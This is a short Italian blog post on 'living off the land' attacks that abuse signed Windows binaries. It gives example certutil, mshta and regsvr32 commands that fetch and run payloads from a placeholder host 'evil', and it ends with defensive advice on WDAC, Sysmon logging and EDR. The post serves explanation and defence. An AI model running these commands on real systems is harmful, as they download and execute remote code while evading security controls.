hackweb
appunti di hacking e tecnologia
IT EN
menù principale
menù utente
non sei loggato

Living off the land: attaccare con gli strumenti già presenti

29 agosto 2024 · 1 min di lettura · #offensive #windows #lolbas

Living off the land significa usare binari legittimi già presenti (e firmati) per azioni malevole, evitando di depositare tool rilevabili. Su Windows sono i LOLBAS; su Linux i GTFOBins.

Esempi

Binari di sistema fidati eseguono compiti da malware senza destare sospetti:

certutil -urlcache -f http://evil/x.exe x.exe   # download
mshta http://evil/x.hta                          # esecuzione
regsvr32 /s /u /i:http://evil/x.sct scrobj.dll   # exec + bypass
rundll32, wmic, bitsadmin, msbuild ...           # e molti altri

Poiché il processo è un binario Microsoft firmato, gli allowlist ingenui e gli AV basati su firma lo lasciano passare.

Difesa

Application control basato sul comportamento, non solo sulla firma (WDAC con regole che limitano l'uso anomalo). Logging di command-line e process tree (Sysmon), rilevando certutil/mshta che contattano Internet. Bloccare i LOLBAS non necessari. EDR sui pattern d'uso, non sui file.


« torna alla home

ultimi post
 
il tuo indirizzo IP:
216.73.216.108
visitatore #0
MOTD:
Ogni astrazione perde da qualche parte.
Qui guardiamo dove.
argomenti